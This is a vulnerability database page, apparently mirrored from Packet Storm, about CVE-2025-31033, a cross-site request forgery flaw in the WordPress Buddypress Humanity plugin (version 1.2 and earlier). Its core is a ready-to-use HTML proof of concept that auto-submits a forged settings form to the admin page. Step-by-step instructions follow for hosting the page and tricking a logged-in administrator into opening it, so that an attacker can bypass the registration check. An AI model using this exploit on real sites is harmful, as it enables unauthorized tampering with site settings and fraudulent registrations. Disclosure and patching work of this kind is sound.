Lucene search
+L

📄 WordPress Buddypress Humanity 1.2 Cross Site Request Forgery

🗓️ 10 Apr 2025 00:00:00Reported by NxploitedType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 235 Views

Buddypress Humanity plugin <= 1.2 is vulnerable to Cross-Site Request Forgery, CVE-2025-31033.

Related
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2025-31033
10 Apr 202510:47
githubexploit
circl
Circl
CVE-2025-31033
9 Apr 202516:48
circl
cnnvd
CNNVD
WordPress plugin Buddypress Humanity 跨站请求伪造漏洞
9 Apr 202500:00
cnnvd
cve
CVE
CVE-2025-31033
9 Apr 202516:10
cve
cvelist
Cvelist
CVE-2025-31033 WordPress Buddypress Humanity plugin <= 1.2 - CSRF to Privilege Escalation vulnerability
9 Apr 202516:10
cvelist
euvd
EUVD
EUVD-2025-10651
3 Oct 202520:07
euvd
kitploit
Kitploit
CVE-2025-31033
28 Aug 202613:42
kitploit
nvd
NVD
CVE-2025-31033
9 Apr 202517:15
nvd
patchstack
Patchstack
WordPress Buddypress Humanity plugin <= 1.2 - CSRF to Privilege Escalation vulnerability
9 Apr 202517:37
patchstack
redhatcve
RedhatCVE
CVE-2025-31033
11 Apr 202517:07
redhatcve
Rows per page
# ⚠️ CVE-2025-31033 - CSRF in WordPress Buddypress Humanity Plugin <= 1.2
    
    ## 🛡️ Vulnerability Summary
    
    The **Buddypress Humanity** plugin for WordPress (version <= 1.2) is vulnerable to **Cross-Site Request Forgery (CSRF)**.  
    This vulnerability allows an attacker to force a higher privileged user (e.g., admin) to unknowingly modify plugin settings (such as the security question and answer), bypassing user verification logic.
    
    ---
    
    ## 🐞 Vulnerability Type
    
    - **Cross Site Request Forgery (CSRF)**
    - **Component Affected**: `bph-settings` page (admin only)
    - **CVE**: `CVE-2025-31033`
    - **Risks** CVSS 9.8
    
    
    
    
    ---
    
    ## 🚨 Impact
    
    If exploited successfully, this vulnerability allows attackers to:
    
    - Change the **security question** and **answer** used during user registration
    - Bypass humanity verification by knowing the new answer
    - Automate user registration (possibly combined with privilege escalation)
    - Abuse registration form protections without user interaction
    
    ---
    
    ## 🎯 Affected Plugin
    
    - **Name**: Buddypress Humanity
    - **Version**: ≤ 1.2
    - **Slug**: `buddypress-humanity`
    - **Tested on**: WordPress 6.x + BuddyPress active
    
    ---
    
    ## 💥 Proof of Concept (HTML Exploit)
    
    ```html
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Exploit – CVE-2025-31033</title>
    </head>
    <body onload="document.forms[0].submit();">
      <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
        <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
        <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
        <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
        <input type="hidden" name="bph_submit" value="1">
      </form>
    </body>
    </html>
    ```
    
    > ☠️ Once this page is opened by an authenticated admin, it silently modifies the plugin settings.
    
    ---
    
    ## 🔧 How to Exploit
    
    1. Host the PoC HTML on any external server.
    2. Trick a logged-in WordPress admin into visiting the page.
    3. Upon visit, their browser will silently submit the form.
    4. The plugin's security question and answer will be updated.
    5. The attacker can now register using the known answer.
    
    ---
    
    ## 🧪 Successful Exploitation Results In:
    
    - Modified question: **I’m Nxploited | Khaled Alenazi**
    - Modified answer: **Nxploit**
    - Any user who inputs "Nxploit" will bypass verification.
    
    ---
    
    ## ⚠️ Disclaimer
    
    > This proof of concept is for **educational purposes only**.  
    > Use responsibly and **do not test on systems you do not own**.  
    > The author is **not responsible** for any misuse or damage caused.
    
    ---
    
    ## 👤 By
    
    **Nxploited | Khaled Alenazi**

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation